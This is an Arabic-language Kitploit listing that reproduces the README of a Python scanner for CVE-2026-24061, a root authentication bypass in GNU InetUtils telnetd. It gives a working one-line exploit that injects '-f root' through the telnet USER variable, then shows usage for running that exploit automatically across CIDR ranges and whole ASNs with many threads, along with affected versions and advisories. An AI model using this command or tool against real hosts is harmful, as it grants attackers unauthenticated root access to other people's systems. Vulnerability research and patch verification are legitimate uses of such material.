Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Twenty-Three-Scanner — CVE-2026-24061 - تجاوز المصادقة عن بُعد في GNU InetUtils Telnetd | Kitploit
أدوات/GitHubGitHub/madfxr/twenty-three-scanner
الاستطلاعماسحات الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراق
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - تجاوز المصادقة عن بُعد في GNU InetUtils Telnetd

عرض المستودع
4منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛰️ ماسح Twenty-Three

ماسح قوي وسريع وأنيق لاكتشاف خدمات Telnetd الضعيفة المتأثرة بـ CVE-2026-24061. مبني باستخدام مكتبة Python القياسية النقية - بدون أي تبعيات خارجية.

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 جدول المحتويات

  • ⚖️ الترخيص
  • 🧩 الميزات
  • ☣️ تفاصيل الثغرة
    • ⚡ حالة الخدمة
    • 🧪 إثبات المفهوم (PoC)
    • 💥 الإصدارات المتأثرة
    • 🧵 الإصدارات المُصححة
    • ⚔️ ناقل الهجوم
    • 🚨 درجة CVSS
  • 🛠️ التثبيت
  • 📜 الاستخدام
  • 🎯 أمثلة
  • ⚗️ عروض توضيحية
  • 📖 المراجع

🧩 الميزات

  • 🚀 مسح عالي الأداء – بنية متعددة الخيوط مع عدد خيوط قابل للتكوين.
  • 🌐 إدخال أهداف مرن – دعم لعناوين IP مفردة، نطاقات CIDR، استعلامات ASN، وقوائم من الملفات.
  • 📊 تقدم في الوقت الفعلي – واجهة يونيكود جميلة مع أشرطة تقدم حية.
  • 🤖 ذكاء ASN – جلب تلقائي للبادئات من واجهات برمجة تطبيقات RADB و**BGPView** و**HackerTarget**.
  • 🌍 ذكاء الموقع الجغرافي – جلب في الوقت الفعلي لـ ASN والمزود والموقع من واجهة برمجة تطبيقات ipapi.
  • 💾 انقطاع أنيق – معالجة CTRL+C مع حفظ تلقائي للنتائج.
  • 📝 تسجيل مفصّل – مستويات تفصيل قابلة للتكوين لتصحيح الأخطاء.
  • 🛡️ مسح آمن – حدود مدمجة لمنع عمليات المسح الضخمة العرضية.
  • 🎨 مخرجات نظيفة – جداول احترافية بحدود مع ملخصات المسح.
  • 📦 صفر تبعيات – مكتبة Python 3.x القياسية فقط.

☣️ تفاصيل الثغرة

CVE-2026-24061 هي ثغرة حرجة في تجاوز المصادقة في GNU InetUtils Telnetd تسمح للمهاجمين عن بُعد دون مصادقة بالحصول على وصول الجذر من خلال استغلال معالجة خيار NEW-ENVIRON.


⚡ حالة الخدمة

فيما يلي تكوين خدمة Telnetd على جانب المضيف الهدف.

image


🧪 إثبات المفهوم (PoC)

وإليك إثبات المفهوم (PoC) لهذه الثغرة، والذي يمكن تنفيذه يدويًا من مضيف المهاجم ببساطة عن طريق تشغيل الأمر USER="-f root" telnet -a <TARGET_HOST> 23.

image


💥 الإصدارات المتأثرة

  • GNU InetUtils >=1.9.3 <=2.7.
  • توزيعات Linux المدمجة المختلفة.
  • أجهزة إنترنت الأشياء ذات تطبيقات Telnetd الضعيفة.

🧵 الإصدارات المُصححة

  • GNU InetUtils >=2.8.

⚔️ ناقل الهجوم

تستغل الثغرة التحقق غير السليم من متغير البيئة USER في مفاوضات خيار NEW-ENVIRON (RFC 1572) في telnet، مما يسمح للمهاجمين بحقن قيم خبيثة مثل -f root لتجاوز المصادقة.


🚨 درجة CVSS

9.8 (حرجة) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H.


🛠️ التثبيت

root@kitploit:~
# Clone the Repository
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# Make Executable
sudo chmod +x twenty-three-scanner.py

# Run the Script
sudo python3 twenty-three-scanner.py -h

📜 الاستخدام

فيما يلي دليل لأداة Twenty-Three Scanner التي يمكن استخدامها لاكتشاف الثغرة CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass.

root@kitploit:~
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd Remote Authentication Bypass

options:
  -h, --help            show this help message and exit

Target Options:
  -t TARGET, --target TARGET
                        target IP, CIDR, or comma-separated list (can be used multiple times)
  -f FILE, --file FILE  file containing targets (one per line, supports comments with #)
  -a ASN, --asn ASN     autonomous system number (e.g., AS10111 or 10111)

Scan Options:
  -p PORT, --port PORT  target port(s), comma-separated (default: 23)
  --threads N           number of concurrent threads (default: 50)
  --user-value VALUE    USER environment variable value for exploit (default: '-f root')

Timeout Options:
  --connect-timeout SEC
                        TCP connection timeout in seconds (default: 3.0)
  --read-timeout SEC    socket read timeout in seconds (default: 2.0)
  --id-timeout SEC      'id' command response timeout in seconds (default: 2.0)

Limit Options:
  --max-hosts-per-cidr N
                        maximum hosts to scan per CIDR block (default: 1024)
  --max-total-hosts N   maximum total hosts across all targets (default: 50000)
  --skip-large-networks
                        skip networks larger than /16 (avoids accidentally scanning huge ranges)

Output Options:
  -o FILE, --output FILE
                        save vulnerable hosts to file (format: IP:PORT)
  -v, --verbose         enable verbose debug logging

🎯 أمثلة

وإليك بعض الأمثلة حول كيفية استخدام الأمر.

root@kitploit:~
  # Scan Single IP Address, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23

  # Scan Single IP Address, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323

  # Scan Multiple IP Addresses, and Single Port
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23

  # Scan Multiple Addresses, and Multiple Ports
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323

  # Scan CIDR Range, and Single Port with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt

  # Scan CIDR Range, and Multiple Ports with Results
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt

  # Scan Single IP Address, Multiple Addresses, or CIDR Range from File, and Single Port with Custom Thread and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt

  # Scan Single IP Address, Multiple IP Addresss, or CIDR Range from File, and Multiple Ports with Custom Threads and Output 
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt

  # Scan ASN and Single Port with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100

  # Scan ASN and Multiple Ports with Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100

  # Scan ASN with Custom Limits and Custom Threads
  sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100

⚗️ عروض توضيحية

مسح عنوان IP مفرد مع منافذ متعددة.

image

مسح عناوين IP متعددة مع منفذ مفرد.

image

مسح نطاق CIDR مع منفذ مفرد.

image

مسح ASN مع منافذ متعددة.

image

مسح عنوان IP مفرد، أو عناوين متعددة، أو نطاق CIDR من ملف، ومنفذ مفرد مع خيوط ومخرجات مخصصة.

image


📖 المراجع

  • Critical GNU InetUtils telnetd Flaw Lets Attackers Bypass Login and Gain Root Access
  • NVD - CVE-2026-24061
  • CVE Record: CVE-2026-24061
  • Inetutils - GNU network utilities
  • [SECURITY] [DLA 4453-1] inetutils security update
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnet
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
  • CVE-2026-24061 Telnet RCE Exploit - By SafeBreach Labs
تنزيل الأداة